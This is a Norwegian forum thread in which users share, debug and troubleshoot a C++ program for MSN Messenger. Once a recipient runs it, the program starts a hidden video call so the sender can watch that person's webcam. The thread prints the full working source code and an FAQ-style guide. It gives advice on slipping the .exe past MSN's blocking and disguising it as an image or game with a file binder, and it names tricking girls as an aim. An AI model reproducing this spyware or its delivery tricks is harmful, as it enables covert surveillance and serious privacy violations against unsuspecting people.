Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  201 38663
Vet at denne tråden begynner å bli gammel, men jeg må bare spørre..

Er det mulig å bare kopiere koden inn i notepad, skrive inn mailadresse der og lagre som en .exe fil?

Edit: Når jeg gjør det får jeg bare opp en stygg feilmelding..
Sist endret av Pope; 31. august 2006 kl. 22:23.
Trigonoceps occipita
vidarlo's Avatar
Donor
Nei. Det er ukompilert C-kode. Du kan ikkje bare lagre det som ei exe-fil og kjøre den. Du *MÅ* kompilere den først.
Hei, får ikke til å kompilere etter at jeg har tasta inn mailen min der...

Det som kommer når jeg prøver å kompilere er dette:
http://home.no/noxic/bilder/hvorforfunkerdetikke.JPG

Hvis jeg bytter navnet til f.eks. msgruaid1.h (la til et ett-tall) blir det are fucked og alle filene blir 0 kb.
Håper på snarlig hjelp!


Takk
Kan ikke noen legge ut alle filene som trengs klare? Ferdig Komplimert og hele pakka? så det bare er å sende?
Dette går nok ikke blendik. Grunnen til dette er at man må skrive inn sin egen epost-adresse _før_ man komilerer .
Kompilator: Default compiler
Building Makefile: "CTIMMA!!\Makefile.win"
Kjører make clean
rm -f main.o "Prosjekt 1.exe"

g++.exe -c main.cpp -o main.o -I"C:/Dev-Cpp/lib/gcc/mingw32/3.4.2/include" -I"C:/Dev-Cpp/include/c++/3.4.2/backward" -I"C:/Dev-Cpp/include/c++/3.4.2/mingw32" -I"C:/Dev-Cpp/include/c++/3.4.2" -I"C:/Dev-Cpp/include"

main.cpp: In function `int main(int, char**)':

main.cpp:17: error: invalid conversion from `const char*' to `char'
main.cpp:23: error: invalid type argument of `unary *'
main.cpp:24: error: invalid operands of types `OLECHAR*' and `OLECHAR*' to binary `operator*'
main.cpp:24: error: in evaluation of `operator*=(OLECHAR*, OLECHAR*)'
main.cpp:26: error: invalid type argument of `unary *'
main.cpp:35: error: invalid type argument of `unary *'

make.exe: *** [main.o] Error 1

Kjøring avbrutt



Hva kan jeg gjøre nå da?
Bruker Dev-c++4 men jeg får ikke til og lage exe fil i dette programmet :O

Hvordan gjør man det? når jeg trykker compile project lager den bare 3 nye cev filer eller noe

Takk for alle svar
nå får jeg sendt fila og når personen åpner fila så åpnes den i ediaplayer og jeg får ikke noen invitasjon
Sist endret av StaiN; 4. september 2006 kl. 22:44.
Kan hende detta har blitt spurt om før, men trenger man en spesifik type msn? om så vilken version?
Bare bruk MSN Live messenger du! Den funker i allefall på min maskin!
på hvilken linje skal man skrive inn sin egen e-post adresse? Ser ikke at det står sted.
jo10 har en drit god forklaring! nice one

funker fett her! drit gøy
Prøvde som jo10 har forklart så fint, men funker ikke.
Trykker på kompiler, men da skjer det ikke noe.

Feil
Får til å lage programmet, men får jo ikke sendt filen til noen. Prøvde Live messenger, men det står bare at den ikke ble sendt.
Msn blokkerer .exe filer, så det beste er å laste opp filen til en server og gi linken til offeret
Det fungerer fint å zippe den også.
(Da må selfølgelig offeret vite hvordan man bruker winzip)
Funker fint dette, men poenget blir jo litt borte... For den som trykker på filen får jo opp at hun/han starter en videosamtale...
Det kommer ikke noen melding om at jeg starter en videosamtale når jeg starter filen, annet enn hvis jeg bruker en treg pc, da får jeg ett lite glimt
Sitat av Vaffel&lt Vis innlegg
Prøvde som jo10 har forklart så fint, men funker ikke.
Trykker på kompiler, men da skjer det ikke noe.

Feil
Vis hele sitatet...
Tror ikke det går for deg siden du har mail fra ??Portalen??
Sitat av fulloggal
Tror ikke det går for deg siden du har mail fra ??Portalen??
Vis hele sitatet...
har @tafse.com mail. maa man ha hotmail? faar ikke testa naa (bruker pspen ) noen som kan si om det er grunnen?
Hallo ja.... vet d har veart nevt f0r, men d ble ikke gjort noe mer utav d...
D burde veare mulig aa kamuflere denne lille sp0ken i noe annet f.eks et spill...
Det går fint an å kamuflere programmet som noe annet. Jeg bruker filebinderen i Quick batch file compiler.Du kan laste det ned her Du kan også bruke det til å lage oppstart script som kan brukes sammen med webcam filen.
Sist endret av Acin; 18. september 2006 kl. 16:36.
Den personen jeg får til å starte det ser at han sender web cam.

Er dette meningen?

Hvis ikke, hva har jeg gjort galt?
Jeg har følgt dette til punkt og prikk, men får ikke en .exe fil. jeg får disse filene:
A-fil
CPP
O-fil
Kompilert html-hjelpefil
lib-fil
h-fil
dev fil

men jeg får ingen .exe fil etter at jeg har kompilert den. Kommer ikke denne til samme mappe da? :S

EDIT: Jeg fikk det til

Jeg testa det med en venn. Det som skjedde var at han fikk vedlagt bilde opp. Så trykka han ignore, så lukka bare vinduet seg. mer en det skjedde ikke. Jeg fikk ingen invitasjon.. ??
http://www.lightlan.org/screen.JPG
Sist endret av heiheihei; 19. september 2006 kl. 20:12.
Noen som vet hva som får dette problemet til og oppstå?

Og ja, jeg har fulgt instruksjonene til punkt og prikk. Så det må være noe feil med kodingen dere har lagt ut? eller oppdateringer i windows/msn som gjør at dette kommer opp, og at programmet ikke kjører som det skal.. ?
Det funker helt fint her (fulgte jo10 sin fremgangsmåte), men når jeg avslutter så kommer det opp hos den andre at videosamtalen er over.
Når jeg sender det til noen. og de åpner det. skjer det ingenting? det kommer ikke på min skjerm at webcamet slo seg på. men har fått til og lage programe.

Hjelp? ;D
Det blir feil når jeg skriver inn mailen min. oO
▼ ... noen uker senere ... ▼
Jeg får samme feilmelding som heiheihei. Fult mulig jeg gjør feil under komplimenterinsgreiene, noen som gidder å skrive punkt for punkt akkurat dette?

Prøver meg på "kompiler" sjekker loggen og får dette:

Kompilator: Default compiler
Building Makefile: "C: \Documents and Settings\Administrator\Skrivebord\webcam h4x\Makefile.win"
Kjører make...
make.exe -f "C: \Documents and Settings\Administrator\Skrivebord\webcam h4x\Makefile.win" main.o
g++.exe -c main.cpp -o main.o -I"C:/Dev-Cpp/lib/gcc/mingw32/3.4.2/include" -I"C:/Dev-Cpp/include/c++/3.4.2/backward" -I"C:/Dev-Cpp/include/c++/3.4.2/mingw32" -I"C:/Dev-Cpp/include/c++/3.4.2" -I"C:/Dev-Cpp/include"

main.cpp: In function `int main(int, char**)':

main.cpp:15: error: `c' undeclared (first use this function)
main.cpp:15: error: (Each undeclared identifier is reported only once for each function it appears in.)
main.cpp:15: error: stray '@' in program
main.cpp:15: error: expected `;' before "hotmail"

make.exe: *** [main.o] Error 1

Kjøring avbrutt

Er dette meningen? Eller hva gjør jeg feil?

Bruker Dec-C++ 4.9.9.2

Stor takk til den som hjelper meg!

Edit:

Fikk det til, mailen måtte vist bare stå inne i hermetegn ( " )
Sist endret av Zevs; 18. oktober 2006 kl. 22:41.
Nå som jeg har fått filen til å funke, trenger jeg litt hjelp til å kamuflere den.

Skulle gjerne hatt den seende ut som en .jpg fil, både med icon og filendelse (ikke .exe)

Noen som gidder å hjelpe?
Si du trener deg på programmering vel. Lag den til "registrering.exe" f.eks. Og be de teste et enkelt registreringsskjema du har lagd. Fantasi ftw!
Sitat av GeirBauer
Si du trener deg på programmering vel. Lag den til "registrering.exe" f.eks. Og be de teste et enkelt registreringsskjema du har lagd. Fantasi ftw!
Vis hele sitatet...
Joda, men mye enklere å lure jenter med f.eks et bilde.
Ahh, first post :P

Jeg tror en ting vi alle kan være enige om, det finnes ikke et bedre navn en "msn hacker.exe".
Sitat av Zevs
Joda, men mye enklere å lure jenter med f.eks et bilde.
Vis hele sitatet...
Ville du ikke stusset mer over et bilde som ikke vil åpne seg, enn at et program ikke vil åpne seg? Ikke gjør det vanskeligere enn det trenger å være
i en kompilator feks bloodshed dev-c++
kan ikke noen bare legge ut programmet a ?
Sitat av Looke
kan ikke noen bare legge ut programmet a ?
Vis hele sitatet...
Eller bare google det opp?
Sitat av Looke
kan ikke noen bare legge ut programmet a ?
Vis hele sitatet...
Det går ikke, som sagt tidligere.
Du må legge inn eposten til hver enkelt du skal se camet til.
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Noen burde skrive det om til et annet språk, eller ihvertfall gjøre det sånn at en kan endre instillinger UTEN å måtte inn på source-coden..
Fant en link som var ganske interessant:
http://www.infogreg.com/releases/chat/fun-with-msn.html

Jeg lastet ned men nå trenger jeg hjelp til hvordan det virker..

Tror det går ann og se webkameraet uten a den andre brukeren vet om det med dette programmet!
Hos meg ble det bare startet en lydsamtale, ikke video i det hele tatt.
Heisann...leste litt rundt, og måte jo prøva!

but i got a problem!:P
har klart å mekka programet, men er jo alltid problemer:P

Har følgt Jo10 sin måte, heilt nøyaktig, men det som skjer er at vedkommande ser noko i 2 sec så forsviner det, men det kommer ikkje opp noko web-cam samtale akkurat! :P

Can annyone help?

Her er koden, vist nokon gidder å sjekke for feil!



#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;
CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);
cName = "Da9el_a@hotmail.com";
BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
//* *
vName.vt = VT_BSTR;
vName.bstrVal = (BSTR)pbstrName;
//* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();
// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
//* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);
pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Sitat av _haha_
Hos meg ble det bare startet en lydsamtale, ikke video i det hele tatt.
Vis hele sitatet...
Hvis du hadde lest hele tråden hadde du sett at det er fordi "offeret" ikke har lik msn verson som deg..
Sitat av Andersf
Hvis du hadde lest hele tråden hadde du sett at det er fordi "offeret" ikke har lik msn verson som deg..
Vis hele sitatet...
Har du peiling på kva som kan feile min o_O?
Er jo du som har skillz i detta!

Offeret mitt hadde same msn som meg (Windows Live Messenger), men det funka ikkje så godt som håpet!
Hva var det som kom opp da? en samtale?
Han sa det skjedde noko tull, og at det kom ein invitasjon til web-cam opp, men eg hadde da bytta det til hans e-post seff, så inv. til mitt webcam hadde komt opp, men det gjekk vekk etter 2sec...

kom ikkje noko meir på nokon av skjermane!

Får ein bærbar tilgjenglig om ca.50min, og da kan eg prøve ut skikkeleg, men hadde vore fint om dåke hadde funne nokon feil!

Har lest gjennom heile tråden, men fekk forskjellige opfatninger ^^

Noen spørsmål:

Skal ikkje gjere meir med kildekoden en å bytte e-post?
Det er MIN e-post som skal vere i kildekoden?
Det skal gå automatisk når offeret har opnet fila?

EDIT:

Når me bruker Windows Live Messenger Pluss! så kan me lagga egne scripts!
Kunne ikkje det gått ant å mekka denna scripten inn, så me enkelt kunne ha fått starta andre sin web-cam ?

Har det noko å sei vist eg brukker Windows Live Messenger Pluss?
Det er igrunn berre ein add-on!

Eg bruker DeV-C++ v. 4.9.9.2
Sist endret av Korshar; 30. oktober 2006 kl. 21:17.
▼ ... noen uker senere ... ▼
har lagd filen nå og sendte det over som en zip fil.. mottakeren åpnet og trykket på exe filen men ingenting skjedde
Tjaa... Siden mange ser ut til å ha problemer med denne "trojaneren", kan jeg jo like godt lage enda en guide, men denne gangen en troubleshoot. Jeg tar utgangspunkt i hva alt har spurt og svart på, og er det noe som ikke er svart på, hadde det vært fint om noen kunne sendt meg PM eller svart med quote på den spørsmålet om hva som kan være feilen. Jeg har tatt spørsmål som kom etter guiden min

får man lyd eller bilde da? eller begge?:
-Om du har gjort det riktig, skal du få begge.

Virker det hele tiden eller må den personen åpne den for hver gang?:
Dette programmet funker som hvilket som helst annet "dataprogram". Du må åpne det og lukke det. -Personen må starte det og det holder på helt til han avslutter det.

Når jeg esc'er samtalen med de, så får de opp sånn : Videosamtalen med Ols111 er avsluttet. Er det på noen måte mulig å gjøre slik at de ikke ser det?:
-Ja, noen som vet?

Er det nødvendig at MSN.exe er startet når fila åpnes?:
-Jeg tror det, ja.

Jeg finner ingen c++ compilator. Hjelp?:
-Jeg tok 1 google søk, men om du er lat, her er en som kan funke: Dev-C++

Når jeg trykker på web cam til en eller annen etter å ha sendt dem fila så står det bare og "loader" bilde kommer aldri frem:
-Jeg tror at dette er fordi noe er feil med linja eller hans/hennes webcam er fucka. (Correct me if I'm wrong)

Er det mulig å bare kopiere koden inn i notepad, skrive inn mailadresse der og lagre som en .exe fil?:
-Nei, den må kompileres.

Bruker Dev-c++4 men jeg får ikke til og lage exe fil i dette programmet :O Hvordan gjør man det? når jeg trykker compile project lager den bare 3 nye cev filer eller noe
-Hvis dette er et problem, kan det være noe galt med instillinger eller kompilatoren. Sjekk bruksanvisninger/kompilatorens hjemmeside om du trenger hjelp med den.

nå får jeg sendt fila og når personen åpner fila så åpnes den i ediaplayer og jeg får ikke noen invitasjon:
-Det vil si at du ikke har kompilert den riktig (til en .exe fil) eller at personen har en rar instilling på PC'n sin som sier at .exe filer skal åpne i Windows Media Player.

Kan hende detta har blitt spurt om før, men trenger man en spesifik type msn? om så vilken version?:
-Du trenger ikke noen spesifikk version, men du er nødt til å ha lik version av MSN som den med camen. Om du har Windows Live Messenger, må målets pc ha Windows Live Messenger. Om dette ikke stemmer, kan det oppstå feil ved visning av kameraet.

får jo ikke sendt filen til noen. Prøvde Live messenger, men det står bare at den ikke ble sendt:
-MSN blokkerer .exe filer. Prøv å skru av blokkeringen (om det går) eller last den opp på nettet og få personen til å laste ned derfra. Du kan også "gå rundt" dette ved å legge den i en .zip fil.

Jeg vil ha filen gjemt i et spill eller noe annet, og jeg vil ha det som oppstart. Hva gjør jeg?
-Dette var det en som ga et fint svar på:
Sitat av Acin
Det går fint an å kamuflere programmet som noe annet. Jeg bruker filebinderen i Quick batch file compiler.Du kan laste det ned her Du kan også bruke det til å lage oppstart script som kan brukes sammen med webcam filen.
Vis hele sitatet...
kan ikke noen bare legge ut programmet a ?:
- Nei, nei og atter nei. Om du hadde tatt deg tid til å lese hele tråden og fortått programmet, ville du også forstått hvorfor.

Hos meg ble det bare startet en lydsamtale, ikke video i det hele tatt:
- Det er fordi du må bruke samme version som han du sender den til (forklart bedre litt lenger opp)

Det er de spøsmålene jeg fant relevante (og som var godt nok forklart til å kunne svares på) som jeg hadde lyst til å legge ut her. Er det noen spørsmål du kan svarene på, kan du jo skrive det inn eller PMe meg (som sagt) og du kan også sende meg melding/svare om det er noe du synes burde endres. Og til dere som skal prøve dette, vær så snill å lese her før dere spør! Til alle som har PMa meg om guiden, takk og det dere spurte om er svart på her. Og til slutt: Om denne posten kommer litt for sent, ser det hvertfall ut som om den trengs, og tråden er ikke alt for gammel.

- Jo10 aka Gisse.
Sist endret av Gisse; 18. november 2006 kl. 00:48.
Asså, programmet funker på alle Msn versjoner såvidt jeg veit, men "offeret" må ha samme versjon av msn som deg, og det hjelper ikke om du har Live messenger og "offeret" har Live messenger BETA, da vil du få bare lyd.
Fikk ikke til og komplimere jeg heller, så jeg fikk en kompis til og fikse det for meg. Problemet er at alle blir mistenksomme når de får en .exe fil via msn.
Så jeg prøvde og bytte ikon på exe fila, ved og gjøre følgene:
Min Datamaskin -> Tools -> Folder Options -> File types -> Finne exe fila -> Advanced -> også skifte ikon.. Men dette er kun på min data, og ikke på mottaker sin..
Så er det noen som har noen GODE programmer som pakker exe fila inn i f.eks et bilde?
Sitat av Mcmak
Asså, programmet funker på alle Msn versjoner såvidt jeg veit, men "offeret" må ha samme versjon av msn som deg, og det hjelper ikke om du har Live messenger og "offeret" har Live messenger BETA, da vil du få bare lyd.
Fikk ikke til og komplimere jeg heller, så jeg fikk en kompis til og fikse det for meg. Problemet er at alle blir mistenksomme når de får en .exe fil via msn.
Så jeg prøvde og bytte ikon på exe fila, ved og gjøre følgene:
Min Datamaskin -> Tools -> Folder Options -> File types -> Finne exe fila -> Advanced -> også skifte ikon.. Men dette er kun på min data, og ikke på mottaker sin..
Så er det noen som har noen GODE programmer som pakker exe fila inn i f.eks et bilde?
Vis hele sitatet...
Jeg vil ha filen gjemt i et spill eller noe annet, og jeg vil ha det som oppstart. Hva gjør jeg?
-Dette var det en som ga et fint svar på:
Sitat:
Opprinnelig skrevet av Acin
Det går fint an å kamuflere programmet som noe annet. Jeg bruker filebinderen i Quick batch file compiler.Du kan laste det ned her Du kan også bruke det til å lage oppstart script som kan brukes sammen med webcam filen.